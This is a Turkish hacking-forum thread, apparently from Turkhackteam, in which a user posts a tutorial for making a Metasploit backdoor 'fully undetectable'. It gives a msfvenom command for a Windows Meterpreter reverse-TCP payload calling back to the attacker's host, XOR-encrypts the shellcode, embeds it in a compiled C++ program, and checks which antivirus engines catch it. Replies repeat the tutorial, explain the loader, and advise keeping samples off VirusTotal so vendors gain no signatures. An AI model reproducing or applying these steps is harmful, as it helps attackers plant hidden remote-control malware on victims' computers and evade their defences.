%90 Fud Payload Msfvenom

X7R00T

X7R00T

Yeni üye
25 Ağu 2022
23
30
Evet Arkadaşlar bugün sizlere msfvenom dan oluşturduğumuz virüsü %90 oranla fudlayacağız hadi geçelim :)

m6j7x4s.png


ilk olarak buradaki lhost ve lport bilgilerini doldurmanız gerekli doldurduğunuzu var sayarak ratımızı oluşturualım.

msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 -t 15 LHOST=(IP) LPORT=(PORT) -f raw -o raw.txt

ewh9zjq.png

sonra python dilinde yazılmış olan encrypter toolumuza görselde gösterilen şekilde yazıp enter a basıyoruz. Sonra bize shellcode.txt diye bir txt verecek kali de şuan ki işlerimiz bitti windows makinemize geçelim

6b153o2.png


backdorumuzu c++ dilinde bir uygulamaya gizleyeceğiz arkadaşlar bunu düzenlemek ve derlemek için Dev-C++ programını kullanacağız aşağıda hepsinin linki olacaktır.

1gzb7pi.png


burdan yeni proje diyoruz.

2tpgy81.png


buradan windows uygulamasına tıklıyoruz c++ projesi olduğundan emin olun sonra isim verin ve tamam deyin.

hb1afip.png


buradan masaüstüne gelin yeni bi klasör açın ve içine kayıt edin.

2pzf5sr.png


farklı kayıt ettikten sonra böyle bir yer karşılayacak sizi buranın hepsini siliyoruz.

q73jdw9.png


evet arkadaşlar yapıştırdık göründüğü gibi 536 satırda bir kırmızı ok var o satırda char b[] = sonrasını siliyoruz.

rw9nne9.png


yani burada gösterildiği gibi yapıyoruz sonra kalimizden bi txt almıştık gelin bakalım içine.

nkzopga.png


evet göründüğü gibi karışık ve şifrelenmiş bir metin var buraya ctrl+a yapıp ctrl+c yapıp kopyalıyoruz.

pkovwho.png


sonra bu şekilde yapıştırdık tan sonra f9 a basıyoruz. bastıktan sonra bir pencere açılacak ona kaydet deyin ve bekleyin.

745fxu6.png


evet exe miz derlendi gelin bunu antiscan.me taratalım.

59zux7f.png


sonuçlar iyi diyebiliriz arkadaşlar 26 tanesinden 4 tanesine yakalanıyor sadece sizde bu yöntemi kullanarak fudlayabilirsiniz backdoorlarınızı aşağıda kullandığım bütün herşeyin linki olacak ordan indirebilirsiniz iyi forumlar.

İndirme Linki

Virüs Total

Dev C++


 
Napcaz

Napcaz

Anka Team Senior
28 Nis 2019
765
757
Cudi
Txt nin içinde karışık ve şifrelenmiş bir metin var evet ama eklemek istediğim aydınlatmak istediğim hususlar var yüksek müsadenizle...
Bunlar hex tabanlı sayılar ve birlikte assembly talimatlarını oluşturuyorlar yada oluşturuyorlar dı çünkü kullandığınız encrypter bunları xor işlemi ile şifreliyor yani artık zararlı bir kod olmuyor, anlamsız hale getiriyor. Gösterdiğiniz c kodunda da sırasıyla kodun geri kalanında kullanılmak üzere txt nin uzunluğunu hesaplanıyor ardından anahtar ("x" in ascii değeri) kullanılarak içindeki talimatlar tekrardan anlamlı bir kod (zararlı kod) haline getiriliyor. Sonrasında bu kodun uzunluğu kadar hafıza da bir yer açılıyor ve bu yere kod memcpy fonksiyonu ile kopyalanıyor ve bu hafıza bölümü çalıştırılıyor.

Özetle iyi bir fud örneği değil hatta nerdiyse işlevsiz bu tarz işlemler çoğunlukla eğitim amaçlı uygulanır modern antivirüs yazılımları için çocuk oyuncağı bu küçük ayak oyununu anlamak. Virüs ü tespit edenlerin hepsi baba antivirüs yazılımları ve çoğunluk olarak kullanılanlar, mesela şu windows defender bütün windows bilgisayarlarda var zaten, büyük ihtimal onlar runtime aşamasını incelediler programın ve hemen tespit ettiler diğerleri ise internet üzerinden runtime kontrolü yapmadıkları için tespit edemediler diye yorumladım.
 
zeores

zeores

Üye
23 Haz 2021
102
26
X7R00T' Alıntı:
Evet Arkadaşlar bugün sizlere msfvenom dan oluşturduğumuz virüsü %90 oranla fudlayacağız hadi geçelim :)

m6j7x4s.png


ilk olarak buradaki lhost ve lport bilgilerini doldurmanız gerekli doldurduğunuzu var sayarak ratımızı oluşturualım.

msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 -t 15 LHOST=(IP) LPORT=(PORT) -f raw -o raw.txt

ewh9zjq.png

sonra python dilinde yazılmış olan encrypter toolumuza görselde gösterilen şekilde yazıp enter a basıyoruz. Sonra bize shellcode.txt diye bir txt verecek kali de şuan ki işlerimiz bitti windows makinemize geçelim

6b153o2.png


backdorumuzu c++ dilinde bir uygulamaya gizleyeceğiz arkadaşlar bunu düzenlemek ve derlemek için Dev-C++ programını kullanacağız aşağıda hepsinin linki olacaktır.

1gzb7pi.png


burdan yeni proje diyoruz.

2tpgy81.png


buradan windows uygulamasına tıklıyoruz c++ projesi olduğundan emin olun sonra isim verin ve tamam deyin.

hb1afip.png


buradan masaüstüne gelin yeni bi klasör açın ve içine kayıt edin.

2pzf5sr.png


farklı kayıt ettikten sonra böyle bir yer karşılayacak sizi buranın hepsini siliyoruz.

q73jdw9.png


evet arkadaşlar yapıştırdık göründüğü gibi 536 satırda bir kırmızı ok var o satırda char b[] = sonrasını siliyoruz.

rw9nne9.png


yani burada gösterildiği gibi yapıyoruz sonra kalimizden bi txt almıştık gelin bakalım içine.

nkzopga.png


evet göründüğü gibi karışık ve şifrelenmiş bir metin var buraya ctrl+a yapıp ctrl+c yapıp kopyalıyoruz.

pkovwho.png


sonra bu şekilde yapıştırdık tan sonra f9 a basıyoruz. bastıktan sonra bir pencere açılacak ona kaydet deyin ve bekleyin.

745fxu6.png


evet exe miz derlendi gelin bunu antiscan.me taratalım.

59zux7f.png


sonuçlar iyi diyebiliriz arkadaşlar 26 tanesinden 4 tanesine yakalanıyor sadece sizde bu yöntemi kullanarak fudlayabilirsiniz backdoorlarınızı aşağıda kullandığım bütün herşeyin linki olacak ordan indirebilirsiniz iyi forumlar.

İndirme Linki

Virüs Total

Dev C++


Genişletmek için tıkla ...
Eline sağlık
 
X7R00T

X7R00T

Yeni üye
25 Ağu 2022
23
30
Napcaz' Alıntı:
Txt nin içinde karışık ve şifrelenmiş bir metin var evet ama eklemek istediğim aydınlatmak istediğim hususlar var yüksek müsadenizle...
Bunlar hex tabanlı sayılar ve birlikte assembly talimatlarını oluşturuyorlar yada oluşturuyorlar dı çünkü kullandığınız encrypter bunları xor işlemi ile şifreliyor yani artık zararlı bir kod olmuyor, anlamsız hale getiriyor. Gösterdiğiniz c kodunda da sırasıyla kodun geri kalanında kullanılmak üzere txt nin uzunluğunu hesaplanıyor ardından anahtar ("x" in ascii değeri) kullanılarak içindeki talimatlar tekrardan anlamlı bir kod (zararlı kod) haline getiriliyor. Sonrasında bu kodun uzunluğu kadar hafıza da bir yer açılıyor ve bu yere kod memcpy fonksiyonu ile kopyalanıyor ve bu hafıza bölümü çalıştırılıyor.

Özetle iyi bir fud örneği değil hatta nerdiyse işlevsiz bu tarz işlemler çoğunlukla eğitim amaçlı uygulanır modern antivirüs yazılımları için çocuk oyuncağı bu küçük ayak oyununu anlamak. Virüs ü tespit edenlerin hepsi baba antivirüs yazılımları ve çoğunluk olarak kullanılanlar, mesela şu windows defender bütün windows bilgisayarlarda var zaten, büyük ihtimal onlar runtime aşamasını incelediler programın ve hemen tespit ettiler diğerleri ise internet üzerinden runtime kontrolü yapmadıkları için tespit edemediler diye yorumladım.
Genişletmek için tıkla ...
merhaba dostum ben genel olarak kullanabilcekleri bir yöntem paylaştım eğer herşeyi anlatırsam ben ekmek yiyemem anladınmı burada her methodu anlatırsam o methodların ömürleri uzun süreli olmaz lar o yüzden çok üst düzeyde yöntemleri burada paylaşmıyorum. yoksa istediğin antivirüsü getir farketmez :)
 
tursilmatik

tursilmatik

Üye
21 May 2022
65
38
Pitbullar
bak buna gulerım ıste yontemı denedım kaspersky yada trend mıcro olursa sıstemde algılıyor :)
ayrıca memcpy fonksiyonu ile bu is olmaz.

C library function - memcpy()

C library function - memcpy(), The C library function void *memcpy(void *dest, const void *src, size_t n) copies n characters from memory area src to memory area dest.
www.tutorialspoint.com www.tutorialspoint.com
 
ScriptKid

ScriptKid

Katılımcı Üye
5 Şub 2022
607
91
X7R00T' Alıntı:
Evet Arkadaşlar bugün sizlere msfvenom dan oluşturduğumuz virüsü %90 oranla fudlayacağız hadi geçelim :)

m6j7x4s.png


ilk olarak buradaki lhost ve lport bilgilerini doldurmanız gerekli doldurduğunuzu var sayarak ratımızı oluşturualım.

msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 -t 15 LHOST=(IP) LPORT=(PORT) -f raw -o raw.txt

ewh9zjq.png

sonra python dilinde yazılmış olan encrypter toolumuza görselde gösterilen şekilde yazıp enter a basıyoruz. Sonra bize shellcode.txt diye bir txt verecek kali de şuan ki işlerimiz bitti windows makinemize geçelim

6b153o2.png


backdorumuzu c++ dilinde bir uygulamaya gizleyeceğiz arkadaşlar bunu düzenlemek ve derlemek için Dev-C++ programını kullanacağız aşağıda hepsinin linki olacaktır.

1gzb7pi.png


burdan yeni proje diyoruz.

2tpgy81.png


buradan windows uygulamasına tıklıyoruz c++ projesi olduğundan emin olun sonra isim verin ve tamam deyin.

hb1afip.png


buradan masaüstüne gelin yeni bi klasör açın ve içine kayıt edin.

2pzf5sr.png


farklı kayıt ettikten sonra böyle bir yer karşılayacak sizi buranın hepsini siliyoruz.

q73jdw9.png


evet arkadaşlar yapıştırdık göründüğü gibi 536 satırda bir kırmızı ok var o satırda char b[] = sonrasını siliyoruz.

rw9nne9.png


yani burada gösterildiği gibi yapıyoruz sonra kalimizden bi txt almıştık gelin bakalım içine.

nkzopga.png


evet göründüğü gibi karışık ve şifrelenmiş bir metin var buraya ctrl+a yapıp ctrl+c yapıp kopyalıyoruz.

pkovwho.png


sonra bu şekilde yapıştırdık tan sonra f9 a basıyoruz. bastıktan sonra bir pencere açılacak ona kaydet deyin ve bekleyin.

745fxu6.png


evet exe miz derlendi gelin bunu antiscan.me taratalım.

59zux7f.png


sonuçlar iyi diyebiliriz arkadaşlar 26 tanesinden 4 tanesine yakalanıyor sadece sizde bu yöntemi kullanarak fudlayabilirsiniz backdoorlarınızı aşağıda kullandığım bütün herşeyin linki olacak ordan indirebilirsiniz iyi forumlar.

İndirme Linki

Virüs Total

Dev C++


Genişletmek için tıkla ...
Bu yöntem ile windows ta oluşturduğumuz exe uzantılı virüsü de fudlayabilir miyiz?

ScriptKid' Alıntı:
Bu yöntem ile windows ta oluşturduğumuz exe uzantılı virüsü de fudlayabilir miyiz?
Genişletmek için tıkla ...
Up
 
JohnWick51

JohnWick51

Uzman üye
20 Mar 2022
1,866
770
28
X7R00T' Alıntı:
Evet Arkadaşlar bugün sizlere msfvenom dan oluşturduğumuz virüsü %90 oranla fudlayacağız hadi geçelim :)

m6j7x4s.png


ilk olarak buradaki lhost ve lport bilgilerini doldurmanız gerekli doldurduğunuzu var sayarak ratımızı oluşturualım.

msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 -t 15 LHOST=(IP) LPORT=(PORT) -f raw -o raw.txt

ewh9zjq.png

sonra python dilinde yazılmış olan encrypter toolumuza görselde gösterilen şekilde yazıp enter a basıyoruz. Sonra bize shellcode.txt diye bir txt verecek kali de şuan ki işlerimiz bitti windows makinemize geçelim

6b153o2.png


backdorumuzu c++ dilinde bir uygulamaya gizleyeceğiz arkadaşlar bunu düzenlemek ve derlemek için Dev-C++ programını kullanacağız aşağıda hepsinin linki olacaktır.

1gzb7pi.png


burdan yeni proje diyoruz.

2tpgy81.png


buradan windows uygulamasına tıklıyoruz c++ projesi olduğundan emin olun sonra isim verin ve tamam deyin.

hb1afip.png


buradan masaüstüne gelin yeni bi klasör açın ve içine kayıt edin.

2pzf5sr.png


farklı kayıt ettikten sonra böyle bir yer karşılayacak sizi buranın hepsini siliyoruz.

q73jdw9.png


evet arkadaşlar yapıştırdık göründüğü gibi 536 satırda bir kırmızı ok var o satırda char b[] = sonrasını siliyoruz.

rw9nne9.png


yani burada gösterildiği gibi yapıyoruz sonra kalimizden bi txt almıştık gelin bakalım içine.

nkzopga.png


evet göründüğü gibi karışık ve şifrelenmiş bir metin var buraya ctrl+a yapıp ctrl+c yapıp kopyalıyoruz.

pkovwho.png


sonra bu şekilde yapıştırdık tan sonra f9 a basıyoruz. bastıktan sonra bir pencere açılacak ona kaydet deyin ve bekleyin.

745fxu6.png


evet exe miz derlendi gelin bunu antiscan.me taratalım.

59zux7f.png


sonuçlar iyi diyebiliriz arkadaşlar 26 tanesinden 4 tanesine yakalanıyor sadece sizde bu yöntemi kullanarak fudlayabilirsiniz backdoorlarınızı aşağıda kullandığım bütün herşeyin linki olacak ordan indirebilirsiniz iyi forumlar.

İndirme Linki

Virüs Total

Dev C++


Genişletmek için tıkla ...
Ellerine saglik
 
ScriptKid

ScriptKid

Katılımcı Üye
5 Şub 2022
607
91
X7R00T' Alıntı:
Evet Arkadaşlar bugün sizlere msfvenom dan oluşturduğumuz virüsü %90 oranla fudlayacağız hadi geçelim :)

m6j7x4s.png


ilk olarak buradaki lhost ve lport bilgilerini doldurmanız gerekli doldurduğunuzu var sayarak ratımızı oluşturualım.

msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 -t 15 LHOST=(IP) LPORT=(PORT) -f raw -o raw.txt

ewh9zjq.png

sonra python dilinde yazılmış olan encrypter toolumuza görselde gösterilen şekilde yazıp enter a basıyoruz. Sonra bize shellcode.txt diye bir txt verecek kali de şuan ki işlerimiz bitti windows makinemize geçelim

6b153o2.png


backdorumuzu c++ dilinde bir uygulamaya gizleyeceğiz arkadaşlar bunu düzenlemek ve derlemek için Dev-C++ programını kullanacağız aşağıda hepsinin linki olacaktır.

1gzb7pi.png


burdan yeni proje diyoruz.

2tpgy81.png


buradan windows uygulamasına tıklıyoruz c++ projesi olduğundan emin olun sonra isim verin ve tamam deyin.

hb1afip.png


buradan masaüstüne gelin yeni bi klasör açın ve içine kayıt edin.

2pzf5sr.png


farklı kayıt ettikten sonra böyle bir yer karşılayacak sizi buranın hepsini siliyoruz.

q73jdw9.png


evet arkadaşlar yapıştırdık göründüğü gibi 536 satırda bir kırmızı ok var o satırda char b[] = sonrasını siliyoruz.

rw9nne9.png


yani burada gösterildiği gibi yapıyoruz sonra kalimizden bi txt almıştık gelin bakalım içine.

nkzopga.png


evet göründüğü gibi karışık ve şifrelenmiş bir metin var buraya ctrl+a yapıp ctrl+c yapıp kopyalıyoruz.

pkovwho.png


sonra bu şekilde yapıştırdık tan sonra f9 a basıyoruz. bastıktan sonra bir pencere açılacak ona kaydet deyin ve bekleyin.

745fxu6.png


evet exe miz derlendi gelin bunu antiscan.me taratalım.

59zux7f.png


sonuçlar iyi diyebiliriz arkadaşlar 26 tanesinden 4 tanesine yakalanıyor sadece sizde bu yöntemi kullanarak fudlayabilirsiniz backdoorlarınızı aşağıda kullandığım bütün herşeyin linki olacak ordan indirebilirsiniz iyi forumlar.

İndirme Linki

Virüs Total

Dev C++


Genişletmek için tıkla ...
ScriptKid' Alıntı:
Bu yöntem ile windows ta oluşturduğumuz exe uzantılı virüsü de fudlayabilir miyiz?
Genişletmek için tıkla ...
 
darksideofwww

darksideofwww

Katılımcı Üye
28 Tem 2022
912
514
dsowww
X7R00T' Alıntı:
Evet Arkadaşlar bugün sizlere msfvenom dan oluşturduğumuz virüsü %90 oranla fudlayacağız hadi geçelim :)

m6j7x4s.png


ilk olarak buradaki lhost ve lport bilgilerini doldurmanız gerekli doldurduğunuzu var sayarak ratımızı oluşturualım.

msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 -t 15 LHOST=(IP) LPORT=(PORT) -f raw -o raw.txt

ewh9zjq.png

sonra python dilinde yazılmış olan encrypter toolumuza görselde gösterilen şekilde yazıp enter a basıyoruz. Sonra bize shellcode.txt diye bir txt verecek kali de şuan ki işlerimiz bitti windows makinemize geçelim

6b153o2.png


backdorumuzu c++ dilinde bir uygulamaya gizleyeceğiz arkadaşlar bunu düzenlemek ve derlemek için Dev-C++ programını kullanacağız aşağıda hepsinin linki olacaktır.

1gzb7pi.png


burdan yeni proje diyoruz.

2tpgy81.png


buradan windows uygulamasına tıklıyoruz c++ projesi olduğundan emin olun sonra isim verin ve tamam deyin.

hb1afip.png


buradan masaüstüne gelin yeni bi klasör açın ve içine kayıt edin.

2pzf5sr.png


farklı kayıt ettikten sonra böyle bir yer karşılayacak sizi buranın hepsini siliyoruz.

q73jdw9.png


evet arkadaşlar yapıştırdık göründüğü gibi 536 satırda bir kırmızı ok var o satırda char b[] = sonrasını siliyoruz.

rw9nne9.png


yani burada gösterildiği gibi yapıyoruz sonra kalimizden bi txt almıştık gelin bakalım içine.

nkzopga.png


evet göründüğü gibi karışık ve şifrelenmiş bir metin var buraya ctrl+a yapıp ctrl+c yapıp kopyalıyoruz.

pkovwho.png


sonra bu şekilde yapıştırdık tan sonra f9 a basıyoruz. bastıktan sonra bir pencere açılacak ona kaydet deyin ve bekleyin.

745fxu6.png


evet exe miz derlendi gelin bunu antiscan.me taratalım.

59zux7f.png


sonuçlar iyi diyebiliriz arkadaşlar 26 tanesinden 4 tanesine yakalanıyor sadece sizde bu yöntemi kullanarak fudlayabilirsiniz backdoorlarınızı aşağıda kullandığım bütün herşeyin linki olacak ordan indirebilirsiniz iyi forumlar.

İndirme Linki

Virüs Total

Dev C++


Genişletmek için tıkla ...
Bu tür payloadları virus total e koymasanız iyi olur :) antivirüslere feedback yolluyor yoksa bir anlamı kalmaz değil mi :)
 
Kruvazör

Kruvazör

Yazılım Ekibi Lideri
28 Mar 2020
1,718
2,527
Wrong Side Of Heaven
ScriptKid' Alıntı:
@Coderx37 bu soruma cevap verebilir misin?
Genişletmek için tıkla ...
yani, görsele bakarsak konu sahibi kodlara ekleme yapıyor, direkt exe dosyasını fudlamaktan ziyade.

hazır exe dosyalarını fudlamak için farklı yollar var.

(eğer dosyanın kodları sizinse bu şekilde yapabilirsiniz) (arkadaşın kullandığı programı windowsa entegre edip kullanabilirsiniz.)

konuyu düzgün okumaya vakit bulamadım umarım yanlış bilgi vermemişimdir.
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.